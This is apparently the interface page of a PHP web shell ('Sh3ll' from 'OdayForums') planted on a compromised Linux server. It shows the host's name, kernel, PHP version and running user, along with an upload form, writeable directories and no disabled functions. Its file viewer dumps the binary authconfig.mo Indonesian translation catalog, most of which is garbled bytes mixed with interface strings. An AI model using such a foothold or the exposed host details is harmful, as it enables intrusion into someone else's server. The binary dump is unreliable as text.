Sh3ll
OdayForums


Server : Apache
System : Linux server1.cgrithy.com 3.10.0-1160.95.1.el7.x86_64 #1 SMP Mon Jul 24 13:59:37 UTC 2023 x86_64
User : nobody ( 99)
PHP Version : 8.1.23
Disable Function : NONE
Directory :  /usr/share/locale/id/LC_MESSAGES/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //usr/share/locale/id/LC_MESSAGES/authconfig.mo
������N�
'07?	HR
^
iw�}_;�(����;�+'S_u�� �d�/@Bg���
�#(1C
HV!j������	��R�
&6h>��X�h����;}"�!�"�!8ENfx��t�9Yj[r����(0+0\1���.�)[8_�+�6 W#l������5& \}*�,� �+:71r.�.�*%-(S*|'�-�/�$- <R 5� =� 1!:5!7p!+�!>�!)"+="i"*�"9�"0�"-#)M#$w#'�#)�#&�#,$.B$#q$&�$>�$ �$1%(N%Dw%3�%)�%0&)K&Xu&(�&*�&"'�2'G�'D(4M(�(�(�('�(��(H�*�*�*+++$+-+4+<+E+N+
Z+
e+s+�z+
,,a),�,<�,�,�,�,T�,,C-p-�-�-�-�-�-s�-X.@k.m�./
"/0/@/\/a/j/~/�/�/�/�/�/�/�/�/�/	�/�/W�/O0X0j0y0��0�1�1��1��2�q3J'4,r42�4/�455.5;5S5h5t5�5��506@6'[6�6
�6\�6�677,76/75f73�78�7	8"8)488^8��8�94�99�9:&/:V:i:|:�:�:�:�:9�:.&;U;0m;8�;'�;7�;?7<9w<;�<:�<.(=2W=?�=7�=1>34>;h>(�>9�>0?@8?7y?@�?>�?+1@@]@-�@5�@$A4'A<\A6�A7�A+B/4B<dB4�B.�B0C86C%oC(�CH�CD0#D,TDM�D9�D.	E78E!pE_�E+�E5FTF�dFW�FSRG=�G�G!H$H)<H�*KacNLf �x�
{��,�Q;�THyM%Z�+A1��G�n����s��k�$wv���"?U)b�@7([�l|d	m=u
�O]_-zh�J�g}�9rX&'�D!#R8tV~<Fo���:/�S.���C���I\��5��jY�0B6�4PWq2Ep>3�e^�`�i� <Tab>/<Alt-Tab> between elements   |   <Space> selects   |  <F12> next screen*<URL><dn><domain><lowest-highest><module><name><realm><server><servers><workgroup>ADS Realm:Admin Server:AlertAll configuration files which were modified by the previous authentication configuration change will be restored from backup. Revert the changes?AuthenticationAuthentication ConfigurationAuthentication module %s/pam_%s.so is missing. Authentication process might not work correctly.BackBad smart card removal action specified.Base DN:Cache InformationCancelControl how the system verifies users who attempt to log inCreate _home directories on the first loginDo_n't SaveDomain Administrator:Domain Controllers:Domain:Download CA CertificateError downloading CA certificateFingerprint authentication allows you to log in by scanning your finger with the fingerprint reader.Fingerprint readerHostname or ldap:// or ldaps:// URI pointing to the LDAP server.If the home directory of an user doesn't exist yet it will be created automatically on his first login.IgnoreJoin DomainJoin SettingsJoining Winbind DomainKDC:KerberosKerberos SettingsLDAPLDAP SettingsLDAP authenticationLocal authorization is sufficientLockNISNIS SettingsNextNoOkPassword:Realm:Restore the configuration files backed up before the previous configuration changeRevertSave SettingsSecurity Model:Server:Smart card authentication allows you to log in using a certificate and key associated with a smart card.Some of the configuration changes you've made should be saved to disk before continuing.  If you do not save them, then your attempt to join the domain may fail.  Save changes?Template Shell:The %s file was not found, but it is required for %s support to work properly.
Install the %s package, which provides this file.To connect to a LDAP server with TLS protocol enabled you need a CA certificate which signed your server's certificate. Copy the certificate in the PEM format to the '%s' directory.
Then press OK.To verify the LDAP server with TLS protocol enabled you need a CA certificate which signed the server's certificate. Please fill in the URL where the CA certificate in the PEM format can be downloaded from.Unknown password hashing algorithm specified, using sha256.Use DNS to _locate KDCs for realmsUse DNS to locate KDCs for realmsUse DNS to resolve hosts to realmsUse Fingerprint readerUse KerberosUse LDAPUse LDAP AuthenticationUse MD5 PasswordsUse NISUse Shadow PasswordsUse TLSUse Transport Layer Security extension for LDAP as defined by RFC-2830. It must not be ticked with ldaps server URI.Use WinbindUse Winbind AuthenticationUse _TLS to encrypt connectionsUser InformationWarningWhen enabled /etc/security/access.conf will be consulted for authorization of users access.WinbindWinbind SettingsWinbind authenticationYesaction to be taken on smart card removalauthenticate system accounts by local files onlyauthenticate system accounts by network servicesauthorize local users also through remote servicecachingcan only be run as rootcheck access.conf during account authorizationconfigures winbind to allow offline loginconfigures winbind to assume that users with no domain in their user names are domain usersconfigures winbind to assume that users with no domain in their user names are not domain usersconfigures winbind to prevent offline logincreate home directories for users on their first logindefault LDAP base DNdefault LDAP server hostname or URIdefault NIS domaindefault NIS serverdefault hesiod LHSdefault hesiod RHSdefault kerberos KDCdefault kerberos admin serverdefault kerberos realmdefault realm for samba and winbind when security=adsdefault smart card module to usedialog was cancelleddisable LDAP for authentication by defaultdisable LDAP for user information by defaultdisable MD5 passwords by defaultdisable NIS for user information by defaultdisable authentication with fingerprint readers by defaultdisable authentication with smart card by defaultdisable caching of user information by defaultdisable hesiod for user information by defaultdisable kerberos authentication by defaultdisable shadowed passwords by defaultdisable use of DNS to find kerberos KDCsdisable use of DNS to find kerberos realmsdisable use of TLS with LDAP (RFC-2830)disable winbind for authentication by defaultdisable winbind for user information by defaultdisable wins for hostname resolutiondisplay Back instead of Cancel in the main dialog of the TUIdo not check access.conf during account authorizationdo not create home directories for users on their first logindo not display the deprecated text user interfacedo not prefer dns over wins or nis for hostname resolutiondo not require smart card for authentication by defaultdo not start/stop portmap, ypbind, and nscddo not update the configuration files, only print new settingsenable LDAP for authentication by defaultenable LDAP for user information by defaultenable MD5 passwords by defaultenable NIS for user information by defaultenable authentication with fingerprint readers by defaultenable authentication with smart card by defaultenable hesiod for user information by defaultenable kerberos authentication by defaultenable shadowed passwords by defaultenable use of DNS to find kerberos KDCsenable use of DNS to find kerberos realmsenable use of TLS with LDAP (RFC-2830)enable winbind for authentication by defaultenable winbind for user information by defaultenable wins for hostname resolutionhash/crypt algorithm for new passwordsjoin the winbind domain or ads realm now as this administratorload CA certificate from the URLlocal authorization is sufficient for local usersnames of servers to authenticate againstopposite of --test, update configuration files with changed settingsprefer dns over wins or nis for hostname resolutionprobe network for defaults and print themrequire smart card for authentication by defaultrestore the backup of configuration filesrestore the backup of configuration files saved before the previous configuration changesave a backup of all configuration filessecurity mode to use for samba and winbindshadow passwordthe character which will be used to separate the domain and user part of winbind-created user names if winbindusedefaultdomain is not enabledthe directory which winbind-created users will have as home directoriesthe shell which winbind-created users will have as their login shelluid range winbind will assign to domain or ads usersunexpected argumentupdate all configuration filesusage: %s [options]workgroup authentication servers are inProject-Id-Version: PACKAGE VERSION
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2016-06-17 11:35+0200
PO-Revision-Date: 2013-11-20 06:01-0500
Last-Translator: Tomáš Mráz <tmraz@fedoraproject.org>
Language-Team: Indonesian (http://www.transifex.com/projects/p/fedora/language/id/)
Language: id
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Plural-Forms: nplurals=1; plural=0;
X-Generator: Zanata 3.8.4
 <Tab>/<Alt-Tab> untuk switch | <Spasi> untuk memilih | <F12> layar maju*<URL><dn><domain><terendah-tertinggi><module><name><realm><server><server><workgroup>Realm ADS:Server Admin:SinyalSemua berkas konfigurasi yang diubah oleh perubahan konfigurasi otentikasi sebelumnya akan disimpan ulang dari cadangan. Balikkan perubahan?OtentikasiKonfigurasi OtentikasiModul otentikasi %s/pam_%s.so tidak ditemukan. Proses otentikasi tidak akan bekerja dengan benar.MundurTindakan pelepasan kartu cerdas yang rusak telah ditentukan.Base DN:Informasi CacheBatalKontrol bagaimana sistem bisa melakukan verifikasi pengguna yang mencoba untuk masukBuat direktori _home pada login pertama kaliJa_ngan DisimpanAdministrator Domain:Pengontrol Domain:Domain:Unduh Sertifikat CAGagal mengunduh sertifikat CAOtentikasi sidik jari mengijinkan anda untuk masuk dengan cara memindai jari anda mempergunakan pembaca sidik jari.Pembaca sidik jariHostname atau URI ldap:// atau ldaps:// mengarah ke server LDAP.Jika direktori home dari seorang pemakai belum ada, maka akan dibuatkan pertama kali saat pertama kali login.AbaikanGabung DomainPengaturan JoinPenggabungan Domain WinbindKDC:KerberosPengaturan KerberosLDAPPengaturan LDAPOtentikasi LDAPOtorisasi Lokal sudah cukupKunciNISPengaturan NISMajuTidakOkPassword:Realm:Simpan ulang berkas konfigurasi yang di simpan sebelum perubahan konfigurasi sebelumnyaBalikkanSimpan PengaturanModel Kemanan:Server:Otentikasi kartu cerdas mengijinkan anda untuk masuk mempergunakan sertifikat dan kunci yang telah diasosiasikan dengan kartu cerdas.Beberapa perubahan konfigurasi yang telah anda lakukan sebaiknya disimpan dalam disk sebelum di lanjutkan. Jika anda tidak melakukan penyimpanan, maka saat anda mencoba untuk gabung domain akan gagal. Simpan perubahan?Template Shell:Berkas %s tidak bisa ditemukan. tapi berkas tersebut diperlukan untuk dukungan %s agar berjalan secara benar. 
Install paket %s, yang menyediakan berkas tersebut.Untuk bisa melakukan koneksi dengan benar ke server LDAP menggunakan protokol TLS anda perlu sertifikat CA yang menandatangi sertifikat server anda. Copy sertifikat dalam format PEM ke direktori '%s'.
Kemudian tekan OK.Untuk memeriksa LDAP server dengan protokol TSL aktif Anda memerlukan sertifikat CA yang menandai sertifikat server. Isikan URL di mana sertifikat CA dalam format PEM dapat diunduh.Algoritma hashing password yang dipilih tidak dikenal, menggunakan sha256.Gunakan DNS untuk men_locate KDC untuk realmGunakan DNS untuk menemukan lokasi KDC untuk realmGunakan DNS untuk menresolve dari host ke realmGunakan pembaca sidik jariGunakan kerberosGunakan LDAPGunakan Otentikasi LDAPGunakan password MD5Gunakan NISGunakan password ShadowGunakan TLSGunakan ekstensi lapisan keamanan transpor untuk LDAP seperti yang telah didefinisikan dalam RFC-2830. Jangan dipilih bersamaan dengan URI server ldap.Gunakan WinbindGunakan Otentikasi WinbindGunakan _TLS untuk mengenkripsi koneksiInformasi PenggunaPeringatanJika diaktifkan /etc/security/access.conf akan diperiksa untuk otorisasi dari akses pemakai.WinbindPengaturan WinbindOtentikasi WinbindYatindakan yang akan diambil ketika kartu cerdas dilepasotentikasi akun sistem hanya berdasarkan berkas lokalotentikasi akun sistem berdasarkan layanan jaringanotorisasi pengguna lokal juga melalui layanan jarak jauhcachinghanya bisa dijalankan sebagai rootperiksa access.conf selama otorisasi akunkonfigur winbind agar diperbolehkan login secara offlinewinbind yang dikonfigur itu harus diasumsikan pengguna yang tidak memiliki domain di dalam nama pengguna mereka adalah pengguna domainwinbind yang dikonfigur itu harus diasumsikan pengguna yang tidak memiliki domain di dalam nama pengguna mereka adalah bukan pengguna domainkonfigur winbind untuk mencegah login secara offlinebuat direktori home untuk pemakai pada login pertama kaliStandar LDAP base DNStandar nama host atau URI server LDAPStandar Domain NISStandar server NISstandar LHS hesoidstandar RHS hesoidStandar kerberos KDCstandar server admin kerberosstandar kerberos realmstandar realm untuk samba dan winbind ketika keamanan=adsmodul kartu cerdas standar yang akan digunakandialog sudah dibatalkannonaktifkan LDAP untuk otentikasi secara standarnonaktifkan LDAP untuk informasi pengguna secara standarnonaktifkan password MD5 secara standarnonaktifkan NIS untuk informasi pengguna secara standarnonaktifkan otentikasi dengan pembaca sidik jari secara standarnonaktifkan otentikasi dengan kartu cerdas secara standarnonaktifkan caching untuk informasi pengguna secara standarnonaktifkan hesiod untuk informasi pengguna secara standarnonaktifkan otentikasi kerberos secara standarnonaktifkan password yang tershadow secara standarnonaktifkan penggunaan dari DNS untuk mencari dari KDC kerberosnonaktifkan penggunaan DNS untuk mencari realm kerberosNonaktifkan penggunaan TLS dengan LDAP (RFC-2830)nonaktifkan winbind untuk otentikasi secara standarnonaktifkan winbind untuk informasi pengguna secara standarnonaktifkan wins untuk resolusi hostnametampilkan Kembali daripada Batal di dialog utama dari TUIjangan periksa access.conf selama otorisasi akunjangan buat direktori home untuk pemakai saat login pertama kalijangan tampilkan antarmuka teks yang sudah ditinggalkanjangan gunakan dns sebelum wins atau nis untuk resolusi hostnametidak membutuhkan kartu cerdas untuk otentikasi secara standarJangan start/stop portmap, ypbind, dan nscdjangan perbarui berkas konfigurasi, hanya cetak seting yang baruaktifkan LDAP untuk otentikasi secara standaraktifkan LDAP untuk informasi pengguna secara standaraktifkan password MD5 secara standaraktifkan NIS untuk informasi pengguna secara standaraktifkan otentikasi dengan pembaca sidik jari secara standaraktifkan otentikasi dengan kartu cerdas secara standaraktifkan hesiod untuk informasi pengguna secara standaraktifkan otentikasi kerberos secara standaraktifkan password yang tershadow secara standarAktifkan penggunaan dari DNS untuk mencari KDC dari kerberosaktifkan penggunaan DNS untuk mencari realm kerberosAktifkan penggunaan TLS dengan LDAP (RFC-2830)aktifkan winbind untuk otentikasi secara standaraktifkan winbind untuk informasi pengguna secara standaraktifkan wins untuk resolusi hostnamealgoritma hash/crypt untuk password barugabung dalam domain winbind atau realm sekarang sebagai administratornyamuat sertifikat CA dari URLOtorisasi lokal untuk pengguna lokal sudah cukuppenamaan dari server untuk proses otentikasikebalikan dari --test, perbarui berkas konfigurasi dengan seting yang berubahgunakan dns sebelum wins atau nis untuk resolusi hostnametemukan jaringan untuk standarnya dan cetaklahdibutuhkan kartu cerdas untuk otentikasi secara standarperbarui semua berkas konfigurasisimpan ulang cadangan berkas konfigurasi yang disimpan sebelum perubahan konfigurasi sebelumnyasimpan backup dari semua berkas konfigurasimodus keamanan yang digunakan untuk samba dan winbindpassword shadowKarakter yang akan digunakan untuk memisahkan antara domain dan bagian dari user dari winbind nama user jika winbindusedefaultdomain tidak diaktifkanDirektori yang oleh pengguna hasil kreasi winbind akan digunakan sebagai direktori homeshell yang oleh pengguna hasil kreasi winbind akan digunakan sebagai shell loginnyajarak uid winbind akan menentukan ke domain atau pengguna adsargumen yang tidak diinginkanperbarui semua berkas konfigurasipemakaian: %s [pilihan]server dimana otentikasi workgroup berada

ZeroDay Forums Mini